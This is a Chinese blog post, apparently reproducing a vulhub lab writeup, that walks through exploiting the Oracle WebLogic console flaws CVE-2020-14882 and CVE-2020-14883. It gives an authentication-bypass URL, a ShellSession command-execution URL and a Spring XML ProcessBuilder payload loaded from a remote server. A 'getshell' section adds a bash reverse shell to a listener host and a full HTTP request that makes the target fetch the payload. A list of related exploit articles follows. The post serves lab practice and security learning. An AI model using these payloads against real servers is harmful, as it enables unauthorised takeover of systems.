vulhub-weblogic

最新推荐文章于 2025-03-23 15:25:51 发布
最新推荐文章于 2025-03-23 15:25:51 发布
阅读量1k 收藏 2
点赞数
分类专栏: vulhub
原文链接:http://github.com/vulhub/vulhub
版权

Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

参考链接:

  • https://www.oracle.com/security-alerts/cpuoct2020traditional.html
  • https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

漏洞环境

执行如下命令启动一个Weblogic 12.2.1.3版本的服务器:

docker-compose up -d

启动完成后,访问http://your-ip:7001/console即可查看到后台登录页面。

漏洞复现

首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

在这里插入图片描述

访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码:

在这里插入图片描述

此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

进入容器,可以发现touch /tmp/success1已成功执行:

在这里插入图片描述

这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通杀的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。

首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如http://example.com/rce.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

在这里插入图片描述

这个利用方法也有自己的缺点,就是需要Weblogic的服务器能够访问到恶意XML。

getshell

使用xml的方式来获取shell;
1、先使用服务器104.207.xx.xx,上面写少poc.xml

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
		<value>bash</value>
		<value>-c</value>
		<value><![CDATA[bash -i >& /dev/tcp/149.28.xx.xx/4444 0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

2、在放poc.xml的服务器上,通过python来开启一个服务,让被攻击的服务器来下载:
在这里插入图片描述
3、在监听的机器上监听:
在这里插入图片描述

4、发包:

http://192.168.99.100:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://*.*.*.*/evil.xml")


GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://104.207.xx.xx:8000/poc.xml") HTTP/1.1
Host: 149.xx.xx.xx:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: */*
Referer: http://149.xx.xx.xx:7001/console/css/%252e%252e%252fconsole.portal
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=UU7H_Pzp0Rfi7t3WOUlX0OsnBBcYW4qgPTsfVO0Y5YOxwR78mM0K!394758852; ECS[visit_times]=2; SESSbb36b7f467d752b72cd262e95b89e9f4=9TcUkVUMO2-3O-pbIjvxSNuIz_2fb0IBgRa5ml4EOw8; Drupal.toolbar.collapsed=0; SESScdd472b3d54c289b80603d5f93a10e98=Y_zoNLL64FBS6yWutP_SuNZ7aiNsa-gl5U_W9EO3XLE; CFID=1; CFTOKEN=dfa0ec39a3b0c778-C67BC065-08DC-191A-BD17466F098E86F3; CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduletasks%2Ecfm; ADMINCONSOLESESSION=26yHfxyFGmyMKyJgfpC8C4rqQ33vd0GPsD5cXQGdQs1WH53VdxS7!-998563785
Accept-Encoding: gzip, deflate
Connection: close

5、成功获得shell:
在这里插入图片描述

基于vulhub平台的JAVAEE中间件weblogic漏洞CVE17-10271复现及修复建议
Alexz__的博客
03-21 574
1,漏洞介绍 2,反弹shell利用执行 壹 漏洞介绍 CVE17-10271漏洞全程是 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞 weblogicWebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发...
记录一次vulhubWeblogic反序列化漏洞复现(CVE-2017-10271)
sszsNo1的博客
06-26 244
复现vulhubWeblogic反序列化漏洞复现(CVE-2017-10271)
[Vulhub] Weblogic 漏洞复现
weixin_45605352的博客
09-11 3253
Weblogic 反序列化远程代码执行漏洞(CVE-2019-2725) 0x00 漏洞描述 Weblogic反序列化远程代码执行漏洞。由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送特意构造的恶意HTTP请求,利用该漏洞获取服务器权限,实现远程代码执行。 0x01 影响版本 Oracle WebLogic Server 10.* Oracle WebLogic Server 12.1.3 0x03 漏洞分析 该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/
vulhub | kali Linux搭建vulhub靶场(超详细)
最新发布
03-23 2591
手把手教你用kali轻松搭建 vulhub 测试环境!
vulhub weblogic 靶场攻略
shw_yzh的博客
09-29 1693
通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell。
vulhub weblogic全系列靶场
whale_waves的博客
04-17 1410
Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的 Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。
Weblogic系列漏洞复现——vulhub
qq_45612828的博客
08-08 2176
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic 任意文件上传漏洞(CVE-2018-2894) Weblogic Pre-Auth 远程命令执行(CVE-2020-14882、CVE-2020-14883) Weblogic ssrf(CVE-2014-4210)......
Weblogic——vulhub/weblogic/CVE-2018-2894 任意文件上传复现
(∪.∪ )...zzz的博客
06-20 445
进入weblogic CVE-2018-2894 来源于https://vulhub.org/#/environments/weblogic/CVE-2018-2894/访问http://your-ip:7001/ws_utc/config.do,设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-tes
vulhubWeblogic未授权远程代码执行漏洞复现 (CVE-2023-21839)
yougexiaojiuguan的博客
03-10 489
漏洞复现过程的记录
docker compose v2 使用vulhubweblogic
10-17
1. **下载WebLogic镜像**:首先从 VulHub 获取 WebLogic 的镜像,例如 `docker pull vulhub/weblogic` 或者访问VulHub网站找到相应的tag。 2. **创建YAML配置文件**:在你的项目目录下,创建一个名为 `docker-...
Vulhub漏洞系列:Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weixin_43072923的博客
10-16 3619
xxx:xxx00.前言01.简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.简介   Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/technetw
weblogic漏洞复现整理汇总(vulhub
热门推荐
nzyp_的博客
11-23 1万+
weblogic漏洞复现整理汇总(vulhub) 目录weblogic漏洞复现整理汇总(vulhub)一、概述二、任意文件上传漏洞(CVE-2018-2894)1.引入库2.读入数据总结 根据vulhub已有的复现环境,对weblogic漏洞复现进行一个汇总,包括RCE、未授权任意文件上传、反序列化漏洞等,方便今后回顾学习 一、概述 weblogic是oracle出品的java中间件 端口是7001 默认后台登录地址:http://your-ip:7001/console 常见弱口令: system
Vulhub靶场之weblogic漏洞复现
weixin_66717977的博客
03-21 1776
vulhub靶场上weblogic的漏洞复现
vulhub weblogic CVE-2017-10271
weixin_37639863的博客
02-19 3776
vulhubWeblogic(CVE-2017-10271)漏洞复现_樱浅沐冰的博客-优快云博客_vulhub weblogic漏洞复现背景介绍Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。启动vulhub里的weblogic服务漏洞存在于以下路径:http://192.168.100.23:7001//wls-wsat/CoordinatorPortType
vulhubWeblogic_SSRF(CVE-2014-4210)漏洞复现
qq_45300786的博客
04-12 379
这个真的不知道怎么回事,就是不能反弹shell,可能是我没有redis吧 还是直接放参考链接吧 https://github.com/vulhub/vulhub/blob/master/weblogic/ssrf/README.md https://blog.youkuaiyun.com/LTtiandd/article/details/99592832 https://dyblogs.cn/dy/2275.html ...
vulhub漏洞—Weblogic管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
weixin_45808483的博客
12-20 2914
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 漏洞环境
[vulhub]Weblogic 任意文件上传漏洞(CVE-2018-2894)
静水流深,沧笙踏歌
10-24 2316
CVE-2018-2894 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。 利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。 WebLogic WebLogic是美国Oracle公司出品的一个application serv...
vulhubWeblogic后台部署War包Getshell
qq_45300786的博客
04-13 3151
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟
vulhub weblogic全系列靶场(1)
2401_84973119的博客
05-13 752
Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的 Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值